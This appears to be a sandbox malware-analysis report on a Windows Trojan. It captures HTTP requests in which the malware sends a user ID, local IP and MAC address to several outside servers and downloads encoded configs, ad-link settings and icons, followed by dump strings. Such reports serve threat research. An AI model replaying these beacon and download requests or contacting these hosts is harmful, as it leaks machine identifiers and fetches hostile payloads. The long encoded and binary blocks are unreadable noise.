WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a1g1uStZN/tZN8nvh42yy5zjYtpOb0ddkzy3MsKhIRqCv1dWtL7KUyRvBdNzQhkZ7g7ZxcD0GQdewD7gnpXgKvkcIPWgIAauLrgYRRnGkYGm/h49sgBiteO8 8Qf/c67uqcUL5XFlPi54GkU/tZooNm/Wfunt1CXI/N0o1JV7j/O

<<< skipped >>>

GET /txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:21 GMT

Content-Type: text/plain

Content-Length: 111288

Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT

Connection: close

ETag: "5465770f-1b2b8"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzIbqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5

<<< skipped >>>

GET /desk/cfg.ini HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pro.52icafe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 275

Accept-Ranges: bytes

Server: Tengine/2.0.2

Date: Sat, 04 Apr 2015 04:49:11 GMT

Last-Modified: Fri, 27 Mar 2015 03:31:20 GMT

ETag: "5514cf08-113"

Expires: Sun, 05 Apr 2015 04:49:11 GMT

Cache-Control: max-age=86400

Age: 50667

Powered-By-ChinaCache: HIT from 060320b3SX

[ico].num=3.[0].Ico_min=178.Ico_max=178.name=.........url=hXXp://g.2ksm.com/s/1/999/23903.html?uid=505519.[1].Box=0.Ico_min=190.Ico_max=190.name=.........url=hXXp://uimg.1qwe3r.com/mrcode.php?ai=50511.[2].Box=0.Ico_min=180.Ico_max=189.name=.........url=hXXp://ico1.fdc321.comt>....

GET /desk/ico/178.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pro.52icafe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Sat, 04 Apr 2015 03:37:34 GMT

Content-Type: image/x-icon

Content-Length: 16958

Last-Modified: Thu, 08 Jan 2015 09:44:44 GMT

ETag: "54ae518c-423e"

Expires: Sun, 05 Apr 2015 03:37:34 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 54965

Powered-By-ChinaCache: HIT from 060320b3SX

......@@.... .(B......(...@......... ..............................................)@..(?g.(?..*@..*>..-?...?..!3...$......."...............(..*?..!8.......)........................................................................................................................................f.....................................;^..'?h.(@..'?..$=..&>..*>..*?..(?..,@..,@..(@..!:...6..";..&=..'>...=...7...-....................................................................................................................................................h.........................Kz..:^..3S..7Z..Fq..T...V.."b.. q..,w..(z..&w..%q.."q..#q.."s...e...O...C...3x...8...&... ...*...&...".............................................................................. ....$................................................................."a...Q...M}..V.."j..'...&.../...&...1...8...;...@...2...#...)........s...[...>...-x..)m..&].."S.."K...C...<...*...'...&...#... ................................................... ..(5.............................."..."......................................%i.h!d..#l..(}.. ...-... ...-...,...).../...-...-...8...7...9...D...;o..%Q...F...K...M...6...&i..$V.. K...@...7...*...*...,...,...0...3...-...%... ........................../W..-I..............."..*>..1F../@..1<..19.../..($..#.....................h........,w..*|..,.../.......,... ...-...-...*...%...'...,...-.../...1...3...?...Q...K...*f..!^...R...5...)u..&\.."N..#I...;...<...@...@.. A.. B...;...3.......-...0........

<<< skipped >>>

GET /desk/ico/190.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pro.52icafe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Sat, 04 Apr 2015 03:50:29 GMT

Content-Type: image/x-icon

Content-Length: 16958

Last-Modified: Thu, 12 Feb 2015 06:55:50 GMT

ETag: "54dc4e76-423e"

Expires: Sun, 05 Apr 2015 03:50:29 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 54191

Powered-By-ChinaCache: HIT from 060320b3SX

......@@.... .(B......(...@......... ......B......................................0ET-..,..%F..d...~...................................................................................................................................................................................~...b...7W...'...%0....................................Mo..If..............2...'g...Dd..Bl..Q..!S...Ou..a~..q..D...4...#...,...(...*.../...-.......#.......................................(...(.../...1...3...%...........6...4...&...X...9....Wx..[~..Xw..[y..o...............2U..(,.........................:f.*. >..:^.........................CSv...'.CSv.0?`...6............. GS.0Pa.Dn..............`...........................7...........T............&;.................W....DZ.........f.........J..&A...4..'F.. 6.. 1.......;..........?V...... "-.............a...1T..v.......@\...).Vl~................../P.6Hh.r.....8... .....$3:..26.X{...............CT.."4.................C....m...|..X...p...k.......s....2I..&9.@Xr.........Dn...@S.`.......................@g....9... ... ..! ......)).Pu.......^...... .&..........D`..Go......6[..&=...,...&.-GT.X~..............9Tw......"8...&.JZb...".->B.(AM..3E.. ?.."7.. ?...@.g........... ^}..b...k..1...9...'z...........F_..:S..(>.../.../.."5..1=..=L."DQ.i...^w..................n....C[..!7...)...%.....t|~../K......Ge.#.!......=W0.Ah......<f..(G...7...4...(...%.$EU..............3M.Pv....!...*..%-..... 38..!,.../...'..%8..6P..7O..H\.^..../I.'j..`...`...D...p...>....e..<{..'Xz..-A..&9...%...#.......(.

<<< skipped >>>

GET /desk/ico/184.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pro.52icafe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Sat, 04 Apr 2015 07:24:58 GMT

Content-Type: image/x-icon

Content-Length: 16958

Last-Modified: Tue, 27 Jan 2015 08:43:08 GMT

ETag: "54c74f9c-423e"

Expires: Sun, 05 Apr 2015 07:24:58 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 41322

Powered-By-ChinaCache: HIT from 060320b3SX

......@@.... .(B......(...@......... ......@..................### ###4###H###Z###r###.###.""".###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.###.##$.##%.##%.##%.$$'.$$'.$$(.%%).%%*.''..''/.('0.))2.**5. *7., :.-,=..-?.0/B.0/C.20F.21H.43L.64N.96S.@=_.HElvPMxh_Z.Zoi.J.}.>###6###N###p###./%*.?&0.E'0.F(1.G)2.H)2.H)2.I*3.J*3.J*3.K*4.K*2.L 3.L 4.M 4.M 4.N,4.N,4.O,4.O-4.P-5.P,4.P,4.P,3.Q,4.Q-4.Q-5.R-5.R-5.Q-5.Q-5.P,4.Q-5.P-6.P-7.Q.8.P-7.P.8.P-9.P.;.P.;.P.<.P.=.P.>.P.@.Q.A.Q/B.Q0D.Q0F.Q0F.P0G.P/H.O/H.K.J.;/J.55Q.EBh.RO}pb].\yr.J###H"##t1$*.b&9..(D..-K..3P..7T..9V..;X..<W..>Z..?Y..@[..A\..B[..B[..CZ..E\..F]..G]..G]..H]..H]..I]..I]..J]..K]..K]..L^..M_..M_..M_..L_..L_..L^..L_..K_..J`..J_..J_..Ia..J`..Ia..Ia..Ha..Gb..Fb..Gd..Fe..Fe..Ef..Df..Ce..Af..?d..:b..4_../X.l-Q.@3Q.GDl.ZU.nmg.Z###^6$*.~ ;..$C..,J..3P..8V..<Y..?\..A^..C^..D_..D]..F_..G`..G^..H_..I`..Ja..Ka..Kb..K`..Mb..Mb..Na..Oa..Pa..Pb..Pa..Pb..Qb..Rc..Qb..Qc..Qb..Qc..Qd..Qc..Pd..Pd..Od..Od..Ne..Of..Ng..Ng..Mg..Mh..Mi..Lj..Mj..Lk..Kl..Jl..Hl..Fj..Bh..;d..3_..*Y..(U.H5Y.SO~.ga.h %).t.8...=..(F..1N..7T..=Z..B]..D`..Fa..Ga..Ic..Ib..Jc..Kc..Lc..Mc..Nd..Od..Pd..Pe..Qd..Qd..Re..Se..Sf..Td..Ue..Ud..Ud..Ue..Ve..Ue..Ue..Ve..Vf..Uf..Ug..Ug..Uh..Uh..Tg..Si..Tj..Tk..Sk..Sl..Sm..Sn..Rn..So..Ro..Qq..Pp..Or..Lp..Hm..Bj..9c..0]..$W..(W.LDn.c^.tL"3...7.."@..,K..4R..;X..A_..Ea..Hd..Id..Kf..Lf..Me..Ng..Nf..Of..Pg..Qg..Sh..Sh..Sh..Sh..Uh..Uh..Vh..Wg..Vf..Wh..Xh..Xh..Xh..Zh..Yh..Yh..Yi..Yj..Xh..Yj..Yk..Xk..Xl..Xk..Wm..Xn.

<<< skipped >>>

GET /plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: plus.zzinfor.cn

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.3

Date: Sat, 04 Apr 2015 18:52:49 GMT

Content-Type: application/octet-stream

Content-Length: 1687

Connection: close

Expires: Sat, 04 Apr 2015 18:52:49 GMT

Cache-Control: max-age=0

....<.......`.......X..HXO>B..........................,......T..mz3nU....J..&jG..KCW...O.m8s09j?`h?m<$R.....................................................................................v...`....g.{.U.%..O..e......................./.........................................................O^EL..%7<m0-Ck.,GW.p...`U..~-.".~. -.....9.....5-:hyFXNjm,qh5.` .......................................................................n...........Q...Y..?..U.................... ..................................................ff4pb7l{2)Y.^ {..her^........Y#.........3.c.....>mz(9..JB.(t>...p,...f.5$X.f3#LOV..[Gz5|w($u4$oQ_.[Y..x28/5`dV.6j.....j...tf..h..I@....^.M........er../w1(c...Cdon....h4....19*t?.{k$..A.Bls.tv6H.'7*mewg<p..X..._Q...rj:i.".J......h...h>....J......YX....u....'Xzh2z(g/77*,<v?`Rm4............................................................j..........UU....'.&Pw......he.YCqy9..IUXNf%.LK`5.............................................................h....,......W'...i..2N.0.......................4............................................................f...$...JH.......=@.8.Q.....Ã >&.KNlls0%JKuq.3...STDrsz4mj u&;<7jG8%s=:.=(t1)}mr|(T....f?1y(0=%2}Dv......c.......wS:.)<.Q.ktQ.E......ycQ..7k)....Zd8k2...!.5$X.fx=;8/tdJA.ki%;p9".NL.RCV. 4`{=%(;-x>$RGb[Br.....r...`%!.Vd.HnYa..GW.........:u.W...Q@Y.w30}8).x\b>u ...E._.WJ.XEMY.]./kf%.>y.OD{'}~jT.S.X...L.Cz$.....-93$8wu$>K.Z.udDX....@..'...y...[.u....(..............-................................................

<<< skipped >>>

GET /txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:29 GMT

Content-Type: text/plain

Content-Length: 943732

Last-Modified: Fri, 03 Apr 2015 10:02:43 GMT

Connection: close

ETag: "551e6543-e6674"

Accept-Ranges: bytes

fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLAARuVDFElV4lEjSkzOz/kAlpGS VxJ6wCxq3njHLHGDrSpd4t9GUG/XenWQ2aIx2jsui0o8oZPf LOn2ww/Npy2/VNK6uLArY 2DOaLZnkRwmT/bQFdsn0vTxPrhlCcFy k 20AuZlNpLR5W3egF9UDl Z5p lIkp5QaoNWO/91c1pXUqdcHQR1dHg92w1v/LGlOT0VJAnJ36Js9TQHPrsujnxEp37 HoD5p/PsyBOfMwDGEoMtRE5ky9HGzVzp2Oj9/H/lH7C6KbqybZ8CFAAC pK9yNnlse88CyAWsKq19UQycMmZKWFjKsOwfP4K/6iD9wJ7Q56a76E0//4vK0u/k5TIUnKG9bYZGLV4s1PfX/O4rQwerqn4jIePUlfjQi7CkoCiNgdta2vxUFTm9wh1nz0osLYhQnt4il0RRuD6aN0TYaR3XP6XeBJFn9uuoFBmIvo/wiM6gBmct5GdqTfYBe7DnRXLQtZgVvPcKlAIkefOq5hEex1DN eLPXJa2a7bghgMlW7mipls1mJHc9ys4/xs 9meRS3JrCz1veY7nhfcNRYLXROExXv1iYv6H WhriQyigJVizQXrcet8OpvLBHz2fi2n7hNNq286slic3Vd8/gntSCmepuWtO7BES 6SzN5DNTolAKPUQ4qj4b0 U0pb5crra/r/mz/jOnC KIhUoLtqKkssNOWnRvjyTUoNWVN4A0pbpyHrxR6tC8OcT3RwWMW6/n6qNjk30mm3OARwLBhlR5oaMFHGYkFxgWqvFgeDRDL7zL6f/FuMd4R Iq6EE2YHT2ed7WtaL5Un MmEmt7WfYsbNq14DBberjBkyE7HHNExPF2vULtCIHA1P0yh12RkIe 8Tt8oBpNsEa1DMhJUop/jxtH1Ny2d9l/ELtGCOteiO9lMcs552QIUMfhXfFegIzdf3kHKizDVJa5b0guBCq40ru1AQKUlim2dLDDLQEHl4NaJfMzZkWqoQJS5WZoSI634lqP3IeRpPe/wCtnfZw6NqhAfAo5rXb1SP1lTTXFsU69YlE6i0dfomz1NAc uxYI7knJsBotL9vUWdQMPNxD9xMIdLl1wSPq9U7sIHH9NvNQlxdA0qVKIPEpO Off6RBAeAGR1Wnmntsj/CxA6g1enx CBeybNbpcjLWBG62lzyGFUYDXvo7Q71lU9iWi6TDFgNKi3yp9Sott3AI5 M281CXF0DSpWgGKc8YJkZNEoMU2ddoj8MIAcZrtk/HfiCp9o3sgQnA4Y/L2IrekaSXG5AHOfPhajoVqg8YfVY3NJKUsceCuFZzEKdCo4H8TnNJhxH3 uueYJ/GG6CXRUzPYwhIxxG 0nt7ewSAOl4BiiVTPgfum562uZCJljJXaUDZOOUBVYyUtBkC9 1LadbFH/j9zrQCwkudOuqG3c 8270rQ16n/dwiQ27OB4y9G /I0/ooFLXIncYYvJ TUIb6oo9QRCtQJDRnPxQd8p2io6k riaE8UE

<<< skipped >>>

GET /txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:32 GMT

Content-Type: text/plain

Content-Length: 671336

Last-Modified: Sat, 04 Apr 2015 13:58:36 GMT

Connection: close

ETag: "551fee0c-a3e68"

Accept-Ranges: bytes

fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIATI0j4FGOPHCp5fsPM5bcpV9gVv8YkHx4yvOvi PhjnvseNCjxbHglVJKEsfQC1ZE3OCWcvzQbmwCDTQERo7OM0Dsq9ls0obQpmD2yxPW1UfPcgCHpTPb8Y2RJ4h/W/IUoPzmCxZDs116MO2q4P28tueyzvM3jq1nHFshfdphDeIwHThmFssE0A1Pr4qHrkZJuBKno3KVx3e0jT3j7ZHTLmq9Cl15DrYBrHijmrQsV7P5Z v11HmVz3qARYsHSgvX2p93mW75tcyo4i4cXSuNqV4XlCaXso7ucBG/H8fRAKUsrrkw9cIameaUKTw7jvW91i66L0GHh4/uwcqQAzybLIfRfffCP/ 17vZdFfb6am/3VfiqTYvvjyZX3zDmv9KP2Ld4kfjefKFmYzZb1buJgIcHQNVbkQZmMyyQo6vEiUh7DzU7sPkgD2j rwITlxQHJ3qG7Rpz96fvejf3yKyAB2Jt SMsvYR0z2VvfIf8bxWNgKAWXbaeVELwBRK8y4wi4j24JjQJjG7u1Xpc5BtwjuJa5ySDSOGD1cslwsCTpfSGIAzrg5HBpIqJBlEkioafCimRbx22nlRC8AUSnBowDXDoKSEdNfCrOXZCTq4Sj4Di7/mMhRuCyyHdlaqmF5IXbe8jUOlHkCWEyyB8EbpRg6Mp331mmV3Mb 5zbyPLM3/6iQm5UrxEOLXuVD1r1u6bdoOojUF7Y6WmItj5oHy6K2rbfQog/by257LO8xjNEqzdFfuTWr7rSlxGJXdF7APbjAq bJRB7Gd653cwvAQvd9Aa1auBq3HUOen06T f/tYFXf2j6SEdPZ1RXXp X/ILlgTB/IlcGyaRE855xyxyNcTnnljCMeXNabM6EJtexlvw0QqHfPaDkpX7FoA8KoHVtopXClCn/RU3pLqM2LFIgz7JD72wxKdPaxzM4BkCNtiAICqlEO9OfJCW577Zvn28WWptiBje 20jAcFOdEoP/5MnsYKUfxNU8niCc1p2iz2nuCC6kPvRXzm0N73Yp5 Wk57QxbMGb 5UsBy5EfQBl7W0q6ItuztwyIIngRqIHDtl90EbCKrd5G62qqT6akyZfoWywKcMQLBRp1gDmKeflpOe0MWLAEQt8baZ6xH0AZe1tKuiKUeQJYTLIHwH57K0OgyuqQtwICxpqtm1hJB1xQGpBMP/Ju6HhpnFOGGPy9iK3pGknANK6Jryn2TRHfgDB5emdpinn5aTntDFuMoeDl4A2Iby8vtL8r1JM6l/brt2HMUr3SctnX3LoYwJhyjVKOZ2dAWzEnlu9MIT0hDq2HuubrbVburqa5rTZvM58h61Wi7LMlaegKszfeg3DPXFjbdvLYgZ9Xj4X6coUWXdkdHVcKFAFG8WoEkDEEvH//zIJYifeY8DthlBxGVGj3DhG0P1ayqqY8pjKyF3WEs13BbTHXtW1dtOpfjV9LmwbmiS xQvfa5RqidBudg

<<< skipped >>>

GET /txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:20 GMT

Content-Type: text/plain

Content-Length: 1160544

Last-Modified: Wed, 01 Apr 2015 09:48:49 GMT

Connection: close

ETag: "551bbf01-11b560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIP fm 1kX2EpoHPH5y5fSneWMVIcz20hnNCxGkQAG516OSetD3NWwIMVujg9tENOcBTmBWb 7G4WvM1YMoYBR1n/05aTY1HqnuPhzq4dW5N1TlrsSqOdfLX98HF1wgyOXjTHacUFiklRw1yD51UqgiV0AoG /mZXPE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxIR1SJjLO74XPdg0 sDpLF95oztb rsJOq s8Ysjc2A1NnrHs9IEB3ze0Rrwsy6d8uXJyfQNpBOtYm ARi1SoBtib4BGLVKgG2aGS9/2lLN2w/TTJNbMs336wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WtxVTKO98tU Ulb6xRQPYFcxNrNDZlI WvE2s0NmUj5axzbXR wlUOd1udoPMpY2p/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrQFU4iLP8df/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr0E5EPM10K1G5zDifOE4dhzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWRFLQzZfoQutxncZxUXidxxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW69CtAj1kY2R5672j5HZoq8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWC8u eJPQb0XAiYgGUqBt3rE2s0NmUj5a qSnCa1jASD 8BgGQTR5rUy /T2K3JHIn9Bu0mkYE 2xNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpK2E0E4cxijhRTosG6X1WJKNGbDqOkocKG/Y20xSgdf/GrTzUSVsP2Z2R5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRViFvkyNjI9EkZX9CUqPKznL5y1ptSZhF6sYrYY HE8uCwOxCHfECwTHNJHVo7OQn5LioQCSs4YA

<<< skipped >>>

GET /txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:22 GMT

Content-Type: text/plain

Content-Length: 398688

Last-Modified: Fri, 26 Sep 2014 07:22:57 GMT

Connection: close

ETag: "54251451-61560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnLCp18hqxqUIH4hxrH2ruxBV4YQeeGJ65c5wsyHzRsh93kB/WAmaBgr2iApK/YyECWTZc3fHJpIC6vUQIdftw8fH Vki2LxKVQX QpVKPU/IIqA08 jlafX7oH6YXj9Lg9vljEjQvyO2cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a X5Vy1wuSR9dgNryH0CP/d9OaA4pTXvaLuA FC6PJMNxIkW4hj6Qlxo55q3drEIlgh1fMm3K29506aW9b6VGbm/H8aJaRsqeb8fxolpGyp0Wl 66XOXiKtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrKF9xt0oWC4pNX9iA4EJt cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a3r6RMlL8piAxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 4Z HXUJYjwhZJR2tCFCa1xNrNDZlI WsxOHUkBOoRd2lephKWY2T1OF1I1jh1m7N8KoHU8nB51sTazQ2ZSPlr6pKcJrWMBIP1qhO0HLK1lqHsBdnJ2u6Qm0Tw5nyxlSrE2s0NmUj5a3C2I9Jaq5QiP0ady7illlhKe0c7qPxslDsLwTz3lb30xNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

MainPro.exe_604:

.text

`.rdata

@.data

.rsrc

RSSSSSSh

FtPh"

FtPh,

u'SSh |B

Hx.SHx

Uxs.Ux

bx,IfxkFfxÃ¿x

%s (%s:%d)

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl

psapi.dll

games.exb

UserIP.ipb

ntdll.dll

SOFTWARE\Microsoft\Windows\CurrentVersion

